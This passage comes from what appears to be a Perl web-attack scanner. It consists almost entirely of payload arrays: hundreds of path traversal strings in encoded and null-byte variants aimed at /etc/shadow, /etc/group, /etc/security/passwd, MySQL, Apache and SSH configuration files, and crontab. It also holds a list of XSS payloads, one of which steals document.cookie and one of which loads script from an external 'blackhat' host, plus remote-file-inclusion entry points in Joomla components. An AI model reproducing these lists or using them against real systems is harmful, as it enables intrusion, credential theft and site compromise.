2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00","/etc/host.deny","../etc/host.deny","../../etc/host.deny","../../../etc/host.deny","../../../../..//etc/host.deny","/etc/my.cnf","..//etc/my.cnf","../etc/my.cnf","../../../etc/my.cnf","../../../../etc/my.cnf","../../../../../etc/my.cnf","../../../../../../etc/my.cnf","../../../../../../../etc/my.cnf","../../../../../../../../etc/my.cnf","../../../../../../../../../etc/my.cnf","..//etc/my.cnf","..//..//..//etc/my.cnf","..//..//..//..//etc/my.cnf","..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//..//etc/my.cnf","..//..//..//..//..//..//..//..//..//etc/my.cnf","/etc/host.allow","../etc/host.allow","../../etc/host.allow","../../../etc/host.allow","../../../../etc/host.allow","../../../../../etc/host.allow","../../../../../../../etc/host.allow","../../../../../../../../../etc/host.allow","../../../../../../../../../../../etc/host.allow","../../../../../../../../../../../../../../etc/host.allow","//etc/host.allow","..//etc/host.allow","..//..//etc/host.allow","..//..//..//etc/host.allow","..//..//..//..//etc/host.allow","..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//..//..//etc/host.allow","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/host.allow","/etc/httpd/conf/httpd.conf","../etc/httpd/conf/httpd.conf","../../etc/httpd/conf/httpd.conf","../../../etc/httpd/conf/httpd.conf","../../../../etc/httpd/conf/httpd.conf","../../../../../etc/httpd/conf/httpd.conf","../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../../etc/httpd/conf/httpd.conf","../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","//etc/httpd/conf/httpd.conf","..//..//etc/httpd/conf/httpd.conf","..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf","..//..//..//..//..//..//..//..//..//..//..//..//etc/httpd/conf/httpd.conf"
509. ,"../etc/resolv.conf","../../etc/resolv.conf","../../../etc/resolv.conf","../../../../etc/resolv.conf","../../../../../../etc/resolv.conf","../../../../../../../../etc/resolv.conf","../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../../etc/resolv.conf","../../../../../../../../../../../../../../..etc/resolv.conf","..//etc/resolv.conf","..//..//etc/resolv.conf","..//..//..//etc/resolv.conf","..//..//..//..//etc/resolv.conf","../..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//..//..//etc/resolv.conf","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/resolv.conf","/etc/motd","../etc/motd","../../etc/motd","../../../etc/motd","../../../../etc/motd","../../../../../etc/motd","../../../../../../etc/motd","../../../../../../../etc/motd","../../../../../../../../etc/motd","//etc/motd","..//..//etc/motd","..//..//..//etc/motd","..//..//..//..//..//etc/motd","..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//etc/motd","/etc/crontab","../etc/crontab","../../etc/crontab","../../../etc/crontab","../../../../etc/crontab","../../../../../etc/crontab","../../../../../../etc/crontab","../../../../../../../etc/crontab","../../../../../../../../etc/crontab","../../../../../../../../../etc/crontab","//etc/crontab","..//etc/crontab","..//..//etc/crontab","..//..//..//etc/crontab","..//..//..//..//etc/crontab","..//..//..//..//..//etc/crontab","..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//..//etc/crontab","..//..//..//..//..//..//..//..//..//etc/crontab","/etc/ssh/sshd_config","../etc/ssh/sshd_config","../../etc/ssh/sshd_config","../../../etc/ssh/sshd_config","../../../../etc/ssh/sshd_config","../../../../../etc/ssh/sshd_config","../../../../../../etc/ssh/sshd_config","../../../../../../../etc/ssh/sshd_config","../../../../../../../../etc/ssh/sshd_config","../../../../../../../../../etc/ssh/sshd_config","//etc/ssh/sshd_config","..//etc/ssh/sshd_config","..//..//etc/ssh/sshd_config","..//..//..//etc/ssh/sshd_config","..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config","..//..//..//..//..//..//..//..//..//..//..//..//etc/ssh/sshd_config"
510. );
511. ######
512. @XSS = ("Fallag crx",
513. "<center>crx</center>",
514. "<center><marquee>crx</marquee> </center>",
515. "<CeNTer>crx</CeNTer>",
516. "='><script>alert(document.cookie)</script>",
517. "&lt;script&gt;alert('crx');&lt;/script&gt",
518. "a?<script>alert('crx')</script>",
519. "<SCRIPT>a=/crx/alert(a.source)</SCRIPT>",
520. "%3Cscript%3Ealert('crx')%3C/script%3E",
521. "<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>",
522. "<IMG SRC=javascript:alert('crx')>",
523. "<SCRIPT>a=/crx/alert(a.source)</SCRIPT>",
524. "<SCRIPT SRC=http://MrTieDie-blackhat.persiangig.com/XSS.JS?<B>");
525.  
526. ######
527. @RFI = ("/components/com_flyspray/startdown.php?file=",
528. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
529. "/components/com_simpleboard/file_upload.php?sbp=",
530. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
531. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
532. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
533. "/components/com_performs/performs.php?mosConfig_absolute_path=",
534. "/components/com_forum/download.php?phpbb_root_path=",
535. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
536. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
537. "/components/minibb/index.php?absolute_path=",
538. "/components/com_smf/smf.php?mosConfig_absolute_path=",
